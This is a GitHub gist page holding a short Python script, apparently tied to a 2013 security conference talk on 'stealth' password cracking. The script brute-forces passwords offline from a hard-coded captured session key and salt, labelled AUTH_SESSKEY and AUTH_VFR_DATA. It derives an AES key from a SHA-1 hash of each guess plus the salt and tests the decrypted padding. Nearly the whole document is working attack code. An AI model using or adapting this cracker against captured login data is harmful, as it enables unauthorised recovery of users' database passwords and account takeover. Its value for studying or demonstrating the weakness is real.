Created
January 14, 2013 23:35
-
-
Save duongkai/4534572 to your computer and use it in GitHub Desktop.
TetCon_2013_Stealth.Password.Cracking
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Crypto.Cipher import AES | |
| from hashlib import * | |
| from itertools import * | |
| from sys import * | |
| AES_BLOCK_SIZE = 24 | |
| VALID_PADDING = '08' * 8 | |
| IV = ('00' * 16).decode ('hex') | |
| CHARACTER_SET = 'abcdefghijklmnopqrstxyzuvw0123456789' | |
| MIN_LENGTH = 1 | |
| MAX_LENGTH = 8 | |
| def decode (plainPwd, authSessKey, salt): | |
| pwdHash = sha1 (plainPwd + salt.decode ('hex')).hexdigest() | |
| key = pwdHash.decode ('hex') + ('00' * 4).decode ('hex') | |
| encrypt = AES.new (key, AES.MODE_CBC, IV) | |
| return encrypt.decrypt (authSessKey.decode ('hex')).encode ('hex') | |
| def is_valid_sess_key (sessionKey): | |
| return sessionKey[-16:] == VALID_PADDING | |
| authSessKey = 'FBA388EBDB32734E0EB40AF6DB2759AA4035928DF0CA71CEE6637D8E9FEFAEA0D8E45BA9508F7668927CC9478558BAA5' # == AUTH_SESSKEY | |
| salt = '505CF1E6D02DE8374D78' # == AUTH_VFR_DATA | |
| def brute_force(): | |
| for length in xrange (MIN_LENGTH, MAX_LENGTH + 1): | |
| print "Trying with password length: " + str (length) | |
| for pi in product (list (CHARACTER_SET), repeat = length): | |
| tmpSessKey = decode (''.join (pi), authSessKey, salt) | |
| if is_valid_sess_key (tmpSessKey): | |
| print "Find OUT!" | |
| print "Decoded Auth session key: " + tmpSessKey | |
| print "Password: " + ''.join (pi) | |
| exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment